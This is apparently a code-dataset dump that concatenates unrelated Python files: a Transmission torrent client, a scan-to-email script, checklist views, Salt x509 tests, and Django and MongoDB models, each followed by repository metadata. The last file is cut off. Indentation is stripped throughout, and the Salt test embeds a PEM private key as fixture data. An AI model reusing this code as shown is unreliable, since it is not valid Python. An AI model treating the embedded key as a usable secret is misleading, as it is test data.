# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
import re
import json
from base64 import b64encode
import sickbeard
from .generic import GenericClient
class TransmissionAPI(GenericClient):
def __init__(self, host=None, username=None, password=None):
super(TransmissionAPI, self).__init__('Transmission', host, username, password)
if not self.host.endswith('/'):
self.host = self.host + '/'
if self.rpcurl.startswith('/'):
self.rpcurl = self.rpcurl[1:]
if self.rpcurl.endswith('/'):
self.rpcurl = self.rpcurl[:-1]
self.url = self.host + self.rpcurl + '/rpc'
def _get_auth(self):
post_data = json.dumps({'method': 'session-get', })
try:
self.response = self.session.post(self.url, data=post_data.encode('utf-8'), timeout=120,
verify=sickbeard.TORRENT_VERIFY_CERT)
self.auth = re.search('X-Transmission-Session-Id:\s*(\w+)', self.response.text).group(1)
except:
return None
self.session.headers.update({'x-transmission-session-id': self.auth})
#Validating Transmission authorization
post_data = json.dumps({'arguments': {},
'method': 'session-get',
})
self._request(method='post', data=post_data)
return self.auth
def _add_torrent_uri(self, result):
arguments = {'filename': result.url,
'paused': 1 if sickbeard.TORRENT_PAUSED else 0,
'download-dir': sickbeard.TORRENT_PATH
}
post_data = json.dumps({'arguments': arguments,
'method': 'torrent-add',
})
self._request(method='post', data=post_data)
return self.response.json()['result'] == "success"
def _add_torrent_file(self, result):
arguments = {'metainfo': b64encode(result.content),
'paused': 1 if sickbeard.TORRENT_PAUSED else 0,
'download-dir': sickbeard.TORRENT_PATH
}
post_data = json.dumps({'arguments': arguments,
'method': 'torrent-add',
})
self._request(method='post', data=post_data)
return self.response.json()['result'] == "success"
def _set_torrent_ratio(self, result):
ratio = None
if result.ratio:
ratio = result.ratio
mode = 0
if ratio:
if float(ratio) == -1:
ratio = 0
mode = 2
elif float(ratio) >= 0:
ratio = float(ratio)
mode = 1 # Stop seeding at seedRatioLimit
arguments = {'ids': [result.hash],
'seedRatioLimit': ratio,
'seedRatioMode': mode
}
post_data = json.dumps({'arguments': arguments,
'method': 'torrent-set',
})
self._request(method='post', data=post_data)
return self.response.json()['result'] == "success"
def _set_torrent_seed_time(self, result):
if sickbeard.TORRENT_SEED_TIME and sickbeard.TORRENT_SEED_TIME != -1:
time = int(60 * float(sickbeard.TORRENT_SEED_TIME))
arguments = {'ids': [result.hash],
'seedIdleLimit': time,
'seedIdleMode': 1
}
post_data = json.dumps({'arguments': arguments,
'method': 'torrent-set',
})
self._request(method='post', data=post_data)
return self.response.json()['result'] == "success"
else:
return True
def _set_torrent_priority(self, result):
arguments = {'ids': [result.hash]}
if result.priority == -1:
arguments['priority-low'] = []
elif result.priority == 1:
# set high priority for all files in torrent
arguments['priority-high'] = []
# move torrent to the top if the queue
arguments['queuePosition'] = 0
if sickbeard.TORRENT_HIGH_BANDWIDTH:
arguments['bandwidthPriority'] = 1
else:
arguments['priority-normal'] = []
post_data = json.dumps({'arguments': arguments,
'method': 'torrent-set',
})
self._request(method='post', data=post_data)
return self.response.json()['result'] == "success"
api = TransmissionAPI()
|
Elandril/SickRage
|
sickbeard/clients/transmission_client.py
|
Python
|
gpl-3.0
| 5,249
| 0.00362
|
#!/usr/bin/python
import sys,os
from email.Utils import COMMASPACE, formatdate
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
from email.MIMEImage import MIMEImage
from email.MIMEImage import MIMEImage
from email.MIMEBase import MIMEBase
from email import Encoders
import smtplib
import XmlDict
function=sys.argv[1]
user=sys.argv[2]
filename=sys.argv[3]
conf = XmlDict.loadXml("global.xml")
for option in conf["menu"]["option"]:
if ((option["type"].lower()==function.lower()) and (option["name"]==user)):
option_selected = option
msg = MIMEMultipart()
msg['Subject'] = conf["subject"]
msg['From'] = conf["source"]
msg['To'] = COMMASPACE.join([option_selected["config"]])
msg['Date'] = formatdate(localtime=True)
text = "Your scanner happely delivered this pdf to your mailbox.\n"
msg.attach( MIMEText(text) )
part = MIMEBase('application', "pdf")
part.set_payload( open(filename,"rb").read() )
Encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(filename) )
msg.attach(part)
mailer = smtplib.SMTP(conf["smtp"])
#mailer.connect()
mailer.sendmail(conf["source"],option_selected["config"] , msg.as_string())
mailer.close()
|
fcauwe/brother-scan
|
sendfile.py
|
Python
|
gpl-3.0
| 1,234
| 0.016207
|
#--
# Copyright (c) 2012-2014 Net-ng.
# All rights reserved.
#
# This software is licensed under the BSD License, as described in
# the file LICENSE.txt, which you should have received as part of
# this distribution.
#--
from nagare import presentation, security, var, ajax
from nagare.i18n import _
from comp import NewChecklistItem, ChecklistTitle, ChecklistItemTitle, Checklists, Checklist, ChecklistItem
@presentation.render_for(NewChecklistItem)
def render_ChecklistTitle_edit(next_method, self, h, comp, *args):
"""Render the title of the associated object"""
text = var.Var(u'')
with h.form(class_='new-item-form'):
id_ = h.generate_id()
h << h.input(type='text', value=text, id_=id_, placeholder=_(u'Add item')).action(text)
with h.div(class_='btn-group'):
h << h.button(h.i(class_='icon-checkmark'),
class_='btn').action(lambda: comp.answer(text()))
h << h.button(h.i(class_='icon-cross'), class_='btn').action(comp.answer)
if self.focus:
h << h.script("YAHOO.util.Dom.get(%s).focus()" % ajax.py2js(id_))
self.focus = False
return h.root
@presentation.render_for(ChecklistTitle)
def render_ChecklistTitle(self, h, comp, *args):
"""Render the title of the associated object"""
h << h.i(class_='icon-list')
kw = {}
kw['style'] = 'cursor: pointer;display: inline;'
kw['onclick'] = h.a.action(comp.answer).get('onclick').replace('return', "")
with h.div(class_='text-title', **kw):
content = self.text or h.span(_('Edit title'), class_='show_onhover')
h << content
return h.root
@presentation.render_for(ChecklistTitle, model='edit')
def render_ChecklistTitle_edit(next_method, self, h, comp, *args):
"""Render the title of the associated object"""
text = var.Var(self.text)
with h.form(class_='title-form'):
id_ = h.generate_id()
h << h.i(class_='icon-list')
h << h.input(type='text', value=text, id_=id_, placeholder=_(u'Checklist title')).action(text)
with h.div(class_='btn-group'):
h << h.button(h.i(class_='icon-checkmark'), class_='btn').action(lambda: comp.answer(self.change_text(text())))
h << h.button(h.i(class_='icon-cross'), class_='btn').action(comp.answer)
h << h.script("YAHOO.util.Dom.get(%s).focus()" % ajax.py2js(id_))
return h.root
@presentation.render_for(ChecklistItemTitle)
def render_ChecklistTitle(self, h, comp, *args):
"""Render the title of the associated object"""
return h.a(self.text).action(comp.answer)
@presentation.render_for(ChecklistItemTitle, model='edit')
def render_ChecklistTitle_edit(next_method, self, h, comp, *args):
"""Render the title of the associated object"""
text = var.Var(self.text)
with h.form(class_='item-title-form'):
id_ = h.generate_id()
h << h.input(type='text', value=text, id_=id_, placeholder=_(u'Checklist title')).action(text)
with h.div(class_='btn-group'):
h << h.button(h.i(class_='icon-checkmark'), class_='btn').action(lambda: comp.answer(self.change_text(text())))
h << h.button(h.i(class_='icon-cross'), class_='btn').action(comp.answer)
h << h.script("YAHOO.util.Dom.get(%s).focus()" % ajax.py2js(id_))
return h.root
@presentation.render_for(Checklists, 'button')
def render_Checklists_button(self, h, comp, model):
if security.has_permissions('checklist', self.parent):
with h.a(class_='btn').action(self.add_checklist):
h << h.i(class_='icon-list')
h << _('Checklist')
return h.root
@presentation.render_for(Checklists)
def render_Checklists(self, h, comp, model):
if security.has_permissions('checklist', self.parent):
# On drag and drop
action = ajax.Update(action=self.reorder)
action = '%s;_a;%s=' % (h.add_sessionid_in_url(sep=';'), action._generate_replace(1, h))
h.head.javascript(h.generate_id(), '''function reorder_checklists(data) {
nagare_getAndEval(%s + YAHOO.lang.JSON.stringify(data));
}''' % ajax.py2js(action))
# On items drag and drop
action = ajax.Update(action=self.reorder_items)
action = '%s;_a;%s=' % (h.add_sessionid_in_url(sep=';'), action._generate_replace(1, h))
h.head.javascript(h.generate_id(), '''function reorder_checklists_items(data) {
nagare_getAndEval(%s + YAHOO.lang.JSON.stringify(data));
}''' % ajax.py2js(action))
id_ = h.generate_id()
with h.div(class_='checklists', id=id_):
for index, clist in enumerate(self.checklists):
h << clist.on_answer(lambda v, index=index: self.delete_checklist(index))
h << h.script("""$(function() {
$("#" + %(id)s).sortable({
placeholder: "ui-state-highlight",
axis: "y",
handle: ".icon-list",
cursor: "move",
stop: function( event, ui ) { reorder_checklists($('.checklist').map(function() { return this.id }).get()) }
});
$(".checklists .checklist .content ul").sortable({
placeholder: "ui-state-highlight",
cursor: "move",
connectWith: ".checklists .checklist .content ul",
dropOnEmpty: true,
update: function(event, ui) {
var data = {
target: ui.item.closest('.checklist').attr('id'),
index: ui.item.index(),
id: ui.item.attr('id')
}
reorder_checklists_items(data);
}
}).disableSelection();
})""" % {'id': ajax.py2js(id_)})
return h.root
@presentation.render_for(Checklists, 'badge')
def render_Checklists_badge(self, h, comp, model):
if self.checklists:
h << h.span(h.i(class_='icon-list'), ' ', self.nb_items, u' / ', self.total_items, class_='label')
return h.root
@presentation.render_for(Checklist)
def render_Checklist(self, h, comp, model):
with h.div(id='checklist_%s' % self.id, class_='checklist'):
with h.div(class_='title'):
h << self.title
if self.title.model != 'edit':
h << h.a(h.i(class_='icon-cross'), class_='delete').action(comp.answer, 'delete')
with h.div(class_='content'):
if self.items:
h << comp.render(h, 'progress')
with h.ul:
for index, item in enumerate(self.items):
h << h.li(item.on_answer(lambda v, index=index: self.delete_item(index)), id='checklist_item_%s' % item().id)
h << self.new_item
return h.root
@presentation.render_for(Checklist, 'progress')
def render_Checklist_progress(self, h, comp, model):
progress = self.progress
with h.div(class_='progress progress-success'):
h << h.div(class_='bar', style='width:%s%%' % progress)
h << h.span(progress, u'%', class_='percent')
return h.root
@presentation.render_for(ChecklistItem)
def render_ChecklistItem(self, h, comp, model):
h << h.a(h.i(class_='icon-checkbox-' + ('checked' if self.done else 'unchecked'))).action(self.set_done)
h << h.span(self.title, class_='done' if self.done else '')
if not self.title.model == 'edit':
h << h.a(h.i(class_='icon-cross'), class_='delete').action(comp.answer, 'delete')
return h.root
|
Reigel/kansha
|
kansha/checklist/view.py
|
Python
|
bsd-3-clause
| 7,405
| 0.003106
|
import tempfile
import salt.utils.files
from salt.modules import x509 as x509_mod
from salt.states import x509
from tests.support.helpers import dedent
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.mock import MagicMock
from tests.support.unit import TestCase, skipIf
try:
import M2Crypto # pylint: disable=unused-import
HAS_M2CRYPTO = True
except ImportError:
HAS_M2CRYPTO = False
class X509TestCase(TestCase, LoaderModuleMockMixin):
def setup_loader_modules(self):
return {x509: {"__opts__": {"fips_mode": False}}}
def test_certificate_info_matches(self):
cert_info = {"MD5 Finger Print": ""}
required_info = {"MD5 Finger Print": ""}
ret = x509._certificate_info_matches(cert_info, required_info)
assert ret == (True, [])
class X509FipsTestCase(TestCase, LoaderModuleMockMixin):
def setup_loader_modules(self):
self.file_managed_mock = MagicMock()
self.file_managed_mock.return_value = {"changes": True}
return {
x509: {
"__opts__": {"fips_mode": True},
"__salt__": {
"x509.get_pem_entry": x509_mod.get_pem_entry,
"x509.get_private_key_size": x509_mod.get_private_key_size,
},
"__states__": {"file.managed": self.file_managed_mock},
}
}
@skipIf(not HAS_M2CRYPTO, "Skipping, M2Crypto is unavailable")
def test_private_key_fips_mode(self):
"""
:return:
"""
test_key = dedent(
"""
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDx7UUt0cPi5G51
FmRBhAZtZb5x6P0PFn7GwnLmSvLNhCsOcD/vq/yBUU62pknzmOjM5pgWTACZj66O
GOFmWBg06v8+sqUbaF9PZ/CxQD5MogmQhYNgfyuopHWWgLXMub2hlP+15qGohkzg
Tr/mXp2ohVAb6ihjqb7XV9MiZaLNVX+XWauM8SlhqXMiJyDUopEGbg2pLsHhIMcX
1twLlyDja+uDbCMZ4jDNB+wsWxTaPRH8KizfEabB1Cl+fdyD10pSAYcodOAnlkW+
G/DX2hwb/ZAM9B1SXTfZ3gzaIIbqXBEHcZQNXxHL7szBTVcOmfx/RPfOeRncytb9
Mit7RIBxAgMBAAECggEAD4Pi+uRIBsYVm2a7OURpURzEUPPbPtt3d/HCgqht1+ZR
CJUEVK+X+wcm4Cnb9kZpL7LeMBfhtfdz/2LzGagurT4g7nlwg0h3TFVjJ0ryc+G0
cVNOsKKXPzKE5AkPH7kNw04V9Cl9Vpx+U6hZQEHzJHqgP5oNyw540cCtJriT700b
fG1q3PYKWSkDwTiUnJTnVLybFIKQC6urxTeT2UWeiBadfDY7DjI4USfrQsqCfGMO
uWPpOOJk5RIvw5r0Of2xvxV76xCgzVTkgtWjBRMTEkfeYx3019xKlQtAKoGbZd1T
tF8DH0cDlnri4nG7YT8yYvx/LWVDg12E6IZij1X60QKBgQD7062JuQGEmTd99a7o
5TcgWYqDrmE9AEgJZjN+gnEPcsxc50HJaTQgrkV0oKrS8CMbStIymbzMKWifOj7o
gvQBVecydq1AaXePt3gRe8vBFiP4cHjFcSegs9FDvdfJR36iHOBIgEp4DWvV1vgs
+z82LT6Qy5kxUQvnlQ4dEaGdrQKBgQD175f0H4enRJ3BoWTrqt2mTAwtJcPsKmGD
9YfFB3H4+O2rEKP4FpBO5PFXZ0dqm54hDtxqyC/lSXorFCUjVUBero1ECGt6Gnn2
TSnhgk0VMxvhnc0GReIt4K9WrXGd0CMUDwIhFHj8kbb1X1yqt2hwyw7b10xFVStl
sGv8CQB+VQKBgAF9q1VZZwzl61Ivli2CzeS/IvbMnX7C9ao4lK13EDxLLbKPG/CZ
UtmurnKWUOyWx15t/viVuGxtAlWO/rhZriAj5g6CbVwoQ7DyIR/ZX8dw3h2mbNCe
buGgruh7wz9J0RIcoadMOySiz7SgZS++/QzRD8HDstB77loco8zAQfixAoGBALDO
FbTocfKbjrpkmBQg24YxR9OxQb/n3AEtI/VO2+38r4h6xxaUyhwd1S9bzWjkBXOI
poeR8XTqNQ0BR422PTeUT3SohPPcUu/yG3jG3zmta47wjjPDS85lqEgtGvA0cPN7
srErcatJ6nlOnGUSw9/K65y6lFeH2lIZ2hfwNM2dAoGBAMVCc7i3AIhLp6UrGzjP
0ioCHCakpxfl8s1VQp55lhHlP6Y4RfqT72Zq7ScteTrisIAQyI9ot0gsuct2miQM
nyDdyKGki/MPduGTzzWlBA7GZEHnxbAILH8kWJ7eE/Nh7zdF1CRts8utEO9L9S+0
lVz1j/xGOseQk4cVos681Wpw
-----END PRIVATE KEY-----"""
)
test_cert = dedent(
"""
-----BEGIN CERTIFICATE-----
MIIDazCCAlOgAwIBAgIUAfATs1aodKw11Varh55msmU0LoowDQYJKoZIhvcNAQEL
BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0yMTAzMjMwMTM4MzdaFw0yMjAz
MjMwMTM4MzdaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw
HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB
AQUAA4IBDwAwggEKAoIBAQDx7UUt0cPi5G51FmRBhAZtZb5x6P0PFn7GwnLmSvLN
hCsOcD/vq/yBUU62pknzmOjM5pgWTACZj66OGOFmWBg06v8+sqUbaF9PZ/CxQD5M
ogmQhYNgfyuopHWWgLXMub2hlP+15qGohkzgTr/mXp2ohVAb6ihjqb7XV9MiZaLN
VX+XWauM8SlhqXMiJyDUopEGbg2pLsHhIMcX1twLlyDja+uDbCMZ4jDNB+wsWxTa
PRH8KizfEabB1Cl+fdyD10pSAYcodOAnlkW+G/DX2hwb/ZAM9B1SXTfZ3gzaIIbq
XBEHcZQNXxHL7szBTVcOmfx/RPfOeRncytb9Mit7RIBxAgMBAAGjUzBRMB0GA1Ud
DgQWBBT0qx4KLhozvuWAI9peT/utYV9FITAfBgNVHSMEGDAWgBT0qx4KLhozvuWA
I9peT/utYV9FITAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQDx
tWvUyGfEwJJg1ViBa10nVhg5sEc6KfqcPzc2GvatIGJlAbc3b1AYu6677X04SQNA
dYRA2jcZcKudy6eolPJow6SDpkt66IqciZYdbQE5h9elnwpZxmXlJTQTB9cEwyIk
2em5DKpdIwa9rRDlbAjAVJb3015MtpKRu2gsQ7gl5X2U3K+DFsWtBPf+0xiJqUiq
rd7tiHF/zylubSyH/LVONJZ6+/oT/qzJfxfpvygtQWcu4b2zzME/FPenMA8W6Rau
ZYycQfpMVc7KwqF5/wfjnkmfxoFKnkD7WQ3qFCJ/xULk/Yn1hrvNeIr+khX3qKQi
Y3BMA5m+J+PZrNy7EQSa
-----END CERTIFICATE-----
"""
)
fp, name = tempfile.mkstemp()
with salt.utils.files.fopen(name, "w") as fd:
fd.write(test_key)
fd.write(test_cert)
ret = x509.private_key_managed(name)
self.file_managed_mock.assert_called_once()
assert (
self.file_managed_mock.call_args.kwargs["contents"].strip()
== test_key.strip()
)
def test_certificate_info_matches(self):
cert_info = {"MD5 Finger Print": ""}
required_info = {"MD5 Finger Print": ""}
ret = x509._certificate_info_matches(cert_info, required_info)
assert ret == (False, ["MD5 Finger Print"])
|
saltstack/salt
|
tests/unit/states/test_x509.py
|
Python
|
apache-2.0
| 5,661
| 0
|
import re
print " Write product name : "
nume_produs = raw_input()
print " Write product price : "
cost_produs = input()
if (nume_produs == re.sub('[^a-z]',"",nume_produs)):
print ('%s %d'%(nume_produs,cost_produs))
else:
print "Error ! You must tape letters"
input()
|
ActiveState/code
|
recipes/Python/578947_Validate_product/recipe-578947.py
|
Python
|
mit
| 281
| 0.017794
|
from _sha256 import sha256
from typing import Optional
from common.serializers.serialization import domain_state_serializer
from plenum.common.constants import DOMAIN_LEDGER_ID
from plenum.common.request import Request
from plenum.common.txn_util import get_payload_data, get_from, get_req_id
from plenum.server.database_manager import DatabaseManager
from plenum.server.request_handlers.handler_interfaces.write_request_handler import WriteRequestHandler
from plenum.test.constants import BUY
from stp_core.common.log import getlogger
logger = getlogger()
class BuyHandler(WriteRequestHandler):
def __init__(self, database_manager: DatabaseManager):
super().__init__(database_manager, BUY, DOMAIN_LEDGER_ID)
def static_validation(self, request: Request):
self._validate_request_type(request)
def dynamic_validation(self, request: Request, req_pp_time: Optional[int]):
self._validate_request_type(request)
def update_state(self, txn, prev_result, request, is_committed=False):
self._validate_txn_type(txn)
key = self.gen_state_key(txn)
value = domain_state_serializer.serialize({"amount": get_payload_data(txn)['amount']})
self.state.set(key, value)
logger.trace('{} after adding to state, headhash is {}'.
format(self, self.state.headHash))
def gen_state_key(self, txn):
identifier = get_from(txn)
req_id = get_req_id(txn)
return self.prepare_buy_key(identifier, req_id)
@staticmethod
def prepare_buy_key(identifier, req_id):
return sha256('{}{}:buy'.format(identifier, req_id).encode()).digest()
def __repr__(self):
return "TestHandler"
|
evernym/zeno
|
plenum/test/buy_handler.py
|
Python
|
apache-2.0
| 1,707
| 0.001172
|
import os
import finder
import re
import sys
def makefilter(name, xtrapath=None):
typ, nm, fullname = finder.identify(name, xtrapath)
if typ in (finder.SCRIPT, finder.GSCRIPT, finder.MODULE):
return ModFilter([os.path.splitext(nm)[0]])
if typ == finder.PACKAGE:
return PkgFilter([fullname])
if typ == finder.DIRECTORY:
return DirFilter([fullname])
if typ in (finder.BINARY, finder.PBINARY):
return FileFilter([nm])
return FileFilter([fullname])
class _Filter:
def __repr__(self):
return '<'+self.__class__.__name__+' '+repr(self.elements)+'>'
class _NameFilter(_Filter):
""" A filter mixin that matches (exactly) on name """
def matches(self, res):
return self.elements.get(res.name, 0)
class _PathFilter(_Filter):
""" A filter mixin that matches if the resource is below any of the paths"""
def matches(self, res):
p = os.path.normcase(os.path.abspath(res.path))
while len(p) > 3:
p = os.path.dirname(p)
if self.elements.get(p, 0):
return 1
return 0
class _ExtFilter(_Filter):
""" A filter mixin that matches based on file extensions (either way) """
include = 0
def matches(self, res):
fnd = self.elements.get(os.path.splitext(res.path)[1], 0)
if self.include:
return not fnd
return fnd
class _TypeFilter(_Filter):
""" A filter mixin that matches on resource type (either way) """
include = 0
def matches(self, res):
fnd = self.elements.get(res.typ, 0)
if self.include:
return not fnd
return fnd
class _PatternFilter(_Filter):
""" A filter that matches if re.search succeeds on the resource path """
def matches(self, res):
for regex in self.elements:
if regex.search(res.path):
return 1
return 0
class ExtFilter(_ExtFilter):
""" A file extension filter.
ExtFilter(extlist, include=0)
where extlist is a list of file extensions """
def __init__(self, extlist, include=0):
self.elements = {}
for ext in extlist:
if ext[0:1] != '.':
ext = '.'+ext
self.elements[ext] = 1
self.include = include
class TypeFilter(_TypeFilter):
""" A filter for resource types.
TypeFilter(typlist, include=0)
where typlist is a subset of ['a','b','d','m','p','s','x','z'] """
def __init__(self, typlist, include=0):
self.elements = {}
for typ in typlist:
self.elements[typ] = 1
self.include = include
class FileFilter(_NameFilter):
""" A filter for data files """
def __init__(self, filelist):
self.elements = {}
for f in filelist:
self.elements[f] = 1
class ModFilter(_NameFilter):
""" A filter for Python modules.
ModFilter(modlist) where modlist is eg ['macpath', 'dospath'] """
def __init__(self, modlist):
self.elements = {}
for mod in modlist:
self.elements[mod] = 1
class DirFilter(_PathFilter):
""" A filter based on directories.
DirFilter(dirlist)
dirs may be relative and will be normalized.
Subdirectories of dirs will be excluded. """
def __init__(self, dirlist):
self.elements = {}
for pth in dirlist:
pth = os.path.normcase(os.path.abspath(pth))
self.elements[pth] = 1
class PkgFilter(_PathFilter):
"""At this time, identical to a DirFilter (being lazy) """
def __init__(self, pkglist):
#warning - pkgs are expected to be full directories
self.elements = {}
for pkg in pkglist:
pth = os.path.normcase(os.path.abspath(pkg))
self.elements[pth] = 1
class StdLibFilter(_PathFilter):
""" A filter that excludes anything found in the standard library """
def __init__(self):
pth = os.path.normcase(os.path.join(sys.exec_prefix, 'lib'))
self.elements = {pth:1}
class PatternFilter(_PatternFilter):
""" A filter that excludes if any pattern is found in resource's path """
def __init__(self, patterns):
self.elements = []
for pat in patterns:
self.elements.append(re.compile(pat))
|
toontownfunserver/Panda3D-1.9.0
|
direct/pyinst/tocfilter.py
|
Python
|
bsd-3-clause
| 4,386
| 0.007068
|
'''
Created on Nov 17, 2011
@author: mmornati
'''
from django.http import HttpResponse
from django.utils import simplejson as json
import logging
from celery.result import AsyncResult
from webui.restserver.template import render_agent_template
import sys
logger = logging.getLogger(__name__)
def get_progress(request, taskname, taskid):
logger.info("Requesting taskid: %s"%taskid)
result = AsyncResult(taskid, backend=None, task_name=taskname)
logger.info("TASKID: %s"%result.task_id)
dict = {}
if (result.state == 'PENDING'):
dict['state'] = 'Waiting for worker to execute task...'
elif (result.state == 'PROGRESS'):
dict['state'] = 'Operation in progress..'
else:
dict['state'] = result.state
backend_response = None
try:
backend_response = result.result
except:
logger.warn(sys.exc_info())
if backend_response:
if isinstance(result.result, tuple):
response,content,agent,action=result.result
if response.status == 200:
json_data = render_agent_template(request, {}, content, {}, agent, action)
return HttpResponse(json_data, mimetype="application/json")
elif response.status == 408:
dict['state'] = 'FAILURE'
dict['message'] = 'TIMEOUT'
else:
if "current" in result.result and "total" in result.result:
value = float(1.0*result.result['current']/result.result['total'])*100
dict['value'] = value
else:
dict.update({"responsecontent": result.result})
else:
dict['value'] = 0
json_data = json.dumps(dict)
return HttpResponse(json_data, mimetype="application/json")
|
kermitfr/kermit-webui
|
src/webui/progress/views.py
|
Python
|
gpl-3.0
| 1,766
| 0.007361
|
from django.db import models
from djangotoolbox.fields import EmbeddedModelField, ListField
from django_mongodb_engine.contrib import MongoDBManager
import os
# Create your models here.
# save the created json file name path
# only one file for summary should be kept here
class UserJSonFile(models.Model):
user_id = models.CharField(max_length=100)
json_type = models.CharField(max_length=10) # possible value is summary for the summary view
json_file_name = models.CharField(max_length=100) # save the name of the already created file name on disk
class Flow(models.Model):
user_id = models.CharField(max_length=100)
hash_value = models.CharField(max_length=50)
file_name = models.CharField(max_length=50)
upload_time = models.DateTimeField()
file_type = models.CharField(max_length=150)
file_size = models.IntegerField()
path = models.FilePathField()
pcaps = ListField(EmbeddedModelField('Pcap', null=True, blank=True))
details = ListField(EmbeddedModelField('FlowDetails', null=True, blank=True))
def __unicode__(self):
return u'%s/%s' % (self.path, self.file_name)
def get_upload_path(self):
hash_dir = os.path.basename(self.path)
root = os.path.basename(os.path.dirname(self.path))
return os.path.join(root, hash_dir)
class Pcap(models.Model):
hash_value = models.CharField(max_length=100)
file_name = models.FileField(upload_to="uploads", null=True, blank=True)
path = models.FilePathField()
packets = ListField(EmbeddedModelField('PacketDetails', null=True, blank=True))
def __unicode__(self):
return u'%s/%s' % (self.path, self.file_name)
def get_upload_path(self):
hash_dir = os.path.basename(self.path)
root = os.path.basename(os.path.dirname(self.path))
return os.path.join(root, hash_dir)
# there should be also a table of fields that kepts the traffic bytes related with communication
class PacketDetails(models.Model):
#datetime.datetime.fromtimestamp(float("1286715787.71")).strftime('%Y-%m-%d %H:%M:%S')
ident = models.IntegerField()
flow_hash = models.CharField(max_length=50)
timestamp = models.DateTimeField()
length = models.IntegerField()
protocol = models.IntegerField()
src_ip = models.IPAddressField()
dst_ip = models.IPAddressField()
sport = models.IntegerField()
dport = models.IntegerField()
data = models.TextField(null=True, blank=True)
def __unicode__(self):
return u'(%s, %s, %s, %s, %s)' % (self.protocol, self.src_ip, self.sport, self.dst_ip, self.dport)
objects = MongoDBManager()
# save the ips at the applayerproto.log (http.log for ex)
class FlowDetails(models.Model):
parent_hash_value = models.CharField(max_length=50)
user_id = models.CharField(max_length=100)
src_ip = models.IPAddressField()
dst_ip = models.IPAddressField()
sport = models.IntegerField()
dport = models.IntegerField()
protocol = models.CharField(max_length=10)
timestamp = models.DateTimeField()
objects = MongoDBManager()
class HTTPDetails(models.Model):
# request or response
http_type = models.CharField(max_length=10)
# request fields
method = models.CharField(max_length=5, null=True, blank=True)
uri = models.URLField(null=True, blank=True)
headers = models.TextField(null=True, blank=True)
version = models.FloatField(null=True, blank=True)
# request part ends
# response fields
# header and version is here also
reason = models.CharField(max_length="5", null=True, blank=True)
status = models.IntegerField(null=True, blank=True)
# i might need body
body = models.TextField(null=True, blank=True)
content_type = models.CharField(max_length=25, null=True, blank=True)
content_encoding = models.CharField(max_length=25, null=True, blank=True)
# response ends
# i might need files also
files = ListField(null=True, blank=True)
file_path = models.CharField(max_length=200, null=True, blank=True)
flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True)
#for raw_qeuries, filtering according to flow_details will be possible
objects = MongoDBManager()
class DNSRequest(models.Model):
type = models.IntegerField()
human_readable_type = models.CharField(max_length=50)
value = models.CharField(max_length=50, null=True, blank=True)
flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True)
objects = MongoDBManager()
class DNSResponse(models.Model):
type = models.IntegerField()
human_readable_type = models.CharField(max_length=50)
value = ListField(null=True, blank=True)
flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True)
objects = MongoDBManager()
class SMTPDetails(models.Model):
login_data = ListField(null=True, blank=True)
msg_from = models.CharField(max_length=100, null=True, blank=True)
rcpt_to = models.CharField(max_length=100, null=True, blank=True)
raw = models.TextField(null=True, blank=True)
msgdata = models.TextField(null=True, blank=True)
attachment_path = ListField(null=True, blank=True)
flow_details = EmbeddedModelField('FlowDetails', null=True, blank=True)
objects = MongoDBManager()
def get_path_dict(self):
#/home/oguz/git/ovizart/ovizart/uploads/16-06-12/a6a6defb7253043a55281d01aa66538a/smtp-messages/1/part-001.ksh
result = []
for path in self.attachment_path:
tmp = dict()
r = path.split("uploads")
file_name = os.path.basename(r[1])
tmp['file_name'] = file_name
tmp['path'] = r[1]
result.append(tmp)
return result
|
oguzy/ovizart
|
ovizart/pcap/models.py
|
Python
|
gpl-3.0
| 5,743
| 0.003657
|
from django.urls import reverse
from oppia.test import OppiaTestCase
from reports.models import DashboardAccessLog
class ContextProcessorTest(OppiaTestCase):
fixtures = ['tests/test_user.json',
'tests/test_oppia.json',
'tests/test_quiz.json',
'tests/test_permissions.json',
'tests/test_course_permissions.json',
'tests/test_question_indices.json',
'tests/awards/award-course.json',
'tests/test_certificatetemplate.json']
# home page not logged in
def test_get_home_not_logged_in(self):
dal_start_count = DashboardAccessLog.objects.all().count()
self.client.get(reverse('oppia:index'))
dal_end_count = DashboardAccessLog.objects.all().count()
# shouldn't add a log for non logged in users
self.assertEqual(dal_start_count, dal_end_count)
# home page - all users - get
def test_get_home_logged_in(self):
for user in (self.admin_user,
self.normal_user,
self.teacher_user,
self.staff_user):
self.client.force_login(user=user)
dal_start_count = DashboardAccessLog.objects.all().count()
self.client.get(reverse('oppia:index'), follow=True)
dal_end_count = DashboardAccessLog.objects.all().count()
self.assertEqual(dal_start_count+1, dal_end_count)
# home page - all users - post
def test_post_home_logged_in(self):
for user in (self.admin_user,
self.normal_user,
self.teacher_user,
self.staff_user):
self.client.force_login(user=user)
dal_start_count = DashboardAccessLog.objects.all().count()
self.client.post(reverse('oppia:index'),
follow=True,
data={'test': 'mytest'})
dal_end_count = DashboardAccessLog.objects.all().count()
self.assertEqual(dal_start_count+1, dal_end_count)
# admin pages get
def test_get_admin(self):
dal_start_count = DashboardAccessLog.objects.all().count()
self.client.force_login(user=self.admin_user)
self.client.get(reverse('admin:oppia_course_changelist'))
dal_end_count = DashboardAccessLog.objects.all().count()
# shouldn't add a log for admin
self.assertEqual(dal_start_count, dal_end_count)
# admin pages post
# api pages
